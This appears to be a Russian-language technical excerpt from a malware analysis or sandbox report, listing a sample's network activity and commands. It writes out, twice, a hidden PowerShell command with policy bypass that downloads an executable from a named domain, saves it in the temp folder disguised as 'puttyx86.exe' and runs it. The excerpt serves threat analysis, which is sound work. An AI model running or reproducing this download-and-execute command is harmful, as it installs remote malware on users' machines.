Техническая информация
- http://pooyarahyaft.com/amana/pi.exe как %temp%\\puttyx86.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://pooyarahyaft.com/amana/PI.exe','%TEMP%\\puttyx86.exe') & %TEMP%\\puttyx86.exe
- 'po####ahyaft.com':80
- 'po####ahyaft.com':443
- http://po####ahyaft.com/amana/PI.exe
- 'po####ahyaft.com':443
- DNS ASK po####ahyaft.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://pooyarahyaft.com/amana/PI.exe','%TEMP%\\puttyx86.exe') & %TEMP%\\puttyx86.exe' (со скрытым окном)